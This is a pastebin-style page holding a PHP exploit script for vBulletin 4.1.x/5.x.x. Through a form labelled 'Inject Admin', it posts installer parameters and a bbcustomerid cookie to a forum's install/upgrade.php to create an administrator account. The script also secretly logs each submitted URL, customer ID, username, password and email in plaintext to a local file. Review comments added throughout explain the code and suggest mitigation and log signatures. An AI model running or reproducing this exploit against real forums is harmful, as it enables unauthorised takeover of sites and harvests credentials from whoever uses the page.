ForumScriptz

vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit

Sep 8th, 2013
  1. <h1>vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit</h1>
  2. <p>Created by: Boxhead</p>
  3. <p>Found on: 08/22/2013</p>
  4. <p>Website: <a href="http://belegit.net" target="_blank">http://belegit.net</a></p>
  5. <br>
  6. <?php
      // NOTE(review): summary of what this script does when the form below is posted:
      //   - appends the submitted URL, customer ID, username, password and e-mail
      //     to a local file, eutut.txt;
      //   - sends one POST to the submitted URL carrying fixed installer-style
      //     parameters (version=install, step=7) plus htmldata[...] account fields.
      // Defender view: the form's example target is .../install/upgrade.php, so the
      // request only matters where a forum's install directory is still reachable
      // after setup. Removing or blocking that directory is reportedly the
      // mitigation the vendor advised for this issue (confirm against the advisory
      // for your version). In web logs, look for POSTs to install/upgrade.php that
      // carry a bbcustomerid cookie and do not come from the site's administrators.
  7. //extract data from the post (the block runs only when the submit field is present)
  8. if (isset($_POST['submit'])) {
      // NOTE(review): extract() turns every POST key into a local variable. The
      // variables assigned explicitly below overwrite such values, but
      // $fields_string is never initialised, so a POST key with that name would
      // pre-seed the request body. extract() on request data is an anti-pattern.
  9.     extract($_POST);
  10.    
  11.     //set POST variables
  12.     $url = $_POST['url'];
      // NOTE(review): the fopen() result is not checked and the handle is never
      // closed. The path is relative; if the working directory is the web-served
      // script directory, everything logged below can be fetched by anyone who
      // requests eutut.txt (TODO confirm for the deployment).
  13.     $h   = fopen("eutut.txt", "a");
  14.     $b   = $_POST['customerid'];
  15.     $c   = $_POST['username'];
  16.     $d   = $_POST['password'];
  17.     $z   = $_POST['email'];
      // Log record layout: url-customerid-username-password-email, then a run of
      // dashes. Values are written verbatim and in plaintext, password included,
      // with no newline between records. Whoever controls the host running this
      // page receives every value a user types into the form.
  18.     fwrite($h, $url);
  19.     fwrite($h, "-");
  20.     fwrite($h, $b);
  21.     fwrite($h, "-");
  22.     fwrite($h, $c);
  23.     fwrite($h, "-");
  24.     fwrite($h, $d);
  25.     fwrite($h, "-");
  26.     fwrite($h, $z);
  27.     fwrite($h, "------------------------");
      // Request body. Most values are fixed literals; only customerid and the
      // htmldata[...] account fields come from the form. Values are passed through
      // urlencode(); the array keys (including the bracketed ones) are not.
  28.     $fields = array(
  29.         'ajax' => urlencode('1'),
  30.         'version' => urlencode('install'),
  31.         'checktable' => urlencode('false'),
  32.         'firstrun' => urlencode('false'),
  33.         'step' => urlencode('7'),
  34.         'startat' => urlencode('0'),
  35.         'only' => urlencode('false'),
  36.         'customerid' => urlencode($_POST['customerid']),
  37.         'options[skiptemplatemerge]' => urlencode('0'),
  38.         'response' => urlencode('yes'),
  39.         'htmlsubmit' => urlencode('1'),
  40.         'htmldata[username]' => urlencode($_POST['username']),
  41.         'htmldata[password]' => urlencode($_POST['password']),
  42.         'htmldata[confirmpassword]' => urlencode($_POST['password']),
  43.         'htmldata[email]' => urlencode($_POST['email'])
  44.     );
  45.    
  46.     //url-ify the data for the POST
      // NOTE(review): $fields_string is appended to without being initialised, so
      // PHP reports an undefined variable on the first iteration.
  47.     foreach ($fields as $key => $value) {
  48.         $fields_string .= $key . '=' . $value . '&';
  49.     }
      // NOTE(review): rtrim() returns the trimmed string and the return value is
      // discarded here, so the trailing '&' stays in $fields_string.
  50.     rtrim($fields_string, '&');
  51.    
  52.     //open connection
  53.     $ch = curl_init();
  54.    
  55.     //set the url, number of POST vars, POST data
      // NOTE(review): $url is used exactly as posted, with no scheme or host
      // validation, so a hosted copy of this page issues server-side requests to
      // whatever URL a visitor supplies. CURLOPT_POST is a boolean option;
      // count($fields) only works because it is non-zero. The customer ID is sent
      // twice: as a body field and, unencoded, as the bbcustomerid cookie.
      // No User-Agent option is set, so the request likely arrives without that
      // header, which can help when filtering logs for it.
  56.     curl_setopt($ch, CURLOPT_URL, $url);
  57.     curl_setopt($ch, CURLOPT_POST, count($fields));
  58.     curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
  59.     curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
  60.     curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid=' . $_POST['customerid']);
  61.    
  62.     //execute post
      // NOTE(review): CURLOPT_RETURNTRANSFER is not set, so curl_exec() prints the
      // remote response directly into this page's output, unescaped, and $result
      // holds only the success flag. $result is not used afterwards.
  63.     $result = curl_exec($ch);
  64.    
  65.     //close connection
  66.     curl_close($ch);
      // exit() ends the request here, so the form below is not rendered again
      // after a submission.
  67.     exit();
  68. }
  69. ?>
  70. <center>
  71. <form name="sploit" method="POST" action="">
  72. <span>Example:http://test.com/forum/install/upgrade.php</span><br>
  73.   <span>Website:</span>
  74.     <input name="url" type="text" tabindex="1" size="60"   />
  75.     <br>
  76.     <span>Customer ID:</span>
  77.     <input name="customerid" type="text" tabindex="2" size="40" />
  78.     <br>
  79.     <span>Username:</span>
  80.     <input name="username" type="text" tabindex="3" size="40"  />
  81.     <br>
  82.     <span>Password:</span>
  83.     <input name="password" type="text" tabindex="4" size="40" />
  84.     <br>
  85.     <span>Email:</span>
  86.     <input name="email" type="text" tabindex="5" maxlength="40"  />
  87.    
  88. <input name="submit" type="submit" value="Inject Admin">
  89. </form>
  90. </center>